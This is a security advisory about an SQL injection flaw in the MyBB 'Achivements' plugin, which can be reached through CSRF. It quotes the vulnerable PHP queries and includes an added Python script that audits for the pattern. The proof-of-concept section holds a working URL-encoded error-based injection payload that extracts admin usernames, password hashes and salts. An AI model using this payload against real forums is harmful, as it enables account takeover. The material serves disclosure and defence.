MyBB Plugin Achivements <= 2.4 SQL injection through CSRF

# Version 2.4

Introduction
------------

Achievement advanced automated system for MyBB.

SQL Injection
-------------

In admin/module/achivements/regdate.php, L.265:

    $query = $db->simple_select("achivements_regdate", "*", "rgid=".$mybb->input['rgid']);

Or in admin/module/achivements/regdate.php, L.264:

    $query = $db->simple_select("achivements_timeonline", "*", "toid=".$mybb->input['toid']);

And others.
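To find the other instances of this pattern in the plugin, here is an added audit sketch (not part of the original advisory or of the plugin's code). It flags `$mybb->input[...]` values concatenated unquoted after `column=` in a `$db->` call unless they are cast to an integer first. The `audit` helper and its line-based regex heuristic are assumptions, and only the first two sample lines come from the advisory; the rest are constructed.

```python
import re

# Matches user input concatenated right after `<column>=` with no surrounding
# SQL quotes, e.g.  "rgid=".$mybb->input['rgid']
NUMERIC_CONCAT = re.compile(
    r"""=\s*["']\s*\.\s*        # string literal ending in '=', then PHP concat
        (?P<wrap>intval\s*\(|\(int\)\s*|\$db->escape_string\s*\()?
        \$mybb->input\[\s*['"](?P<key>\w+)['"]\s*\]""",
    re.VERBOSE,
)
INT_CAST = re.compile(r"intval\s*\(|\(int\)")


def audit(source, filename="<memory>"):
    """Return (filename, line_no, key, reason) for each unsafe concatenation.

    Heuristic and line-based: calls split over several lines are not seen.
    """
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        if "$db->" not in line:
            continue
        for m in NUMERIC_CONCAT.finditer(line):
            wrap = m.group("wrap") or ""
            if INT_CAST.match(wrap):
                continue  # forced to an integer before it reaches the query
            # escape_string() only escapes quote characters; in an unquoted
            # numeric position the value can still carry SQL syntax.
            reason = ("escaped but unquoted" if "escape_string" in wrap
                      else "raw input")
            findings.append((filename, line_no, m.group("key"), reason))
    return findings


# Lines 2-3 are quoted from the advisory; lines 4-6 are constructed samples.
SAMPLE = r"""<?php
$query = $db->simple_select("achivements_regdate", "*", "rgid=".$mybb->input['rgid']);
$query = $db->simple_select("achivements_timeonline", "*", "toid=".$mybb->input['toid']);
$query = $db->simple_select("achivements_regdate", "*", "rgid=".intval($mybb->input['rgid']));
$query = $db->simple_select("achivements_regdate", "*", "rgid=".$db->escape_string($mybb->input['rgid']));
$db->delete_query("achivements_regdate", "rgid=" . (int)$mybb->input['rgid']);
"""

if __name__ == "__main__":
    for name, line_no, key, reason in audit(SAMPLE, "regdate.php"):
        print(f"{name}:{line_no}: input['{key}'] reaches SQL ({reason})")
```

The integer-cast lines in the sample are the corrected form of the two queries quoted above.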

Proof of concept
----------------

It's a little tricky because the payload must be executed by the admin.
So, through a CSRF, with a payload that redirects to a PHP page after the request, you'll be able
to steal the admin password.

The error-based injection: http://[site]/admin/index.php?module=achivements-regdate&action=delete&rgid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-

Groucho

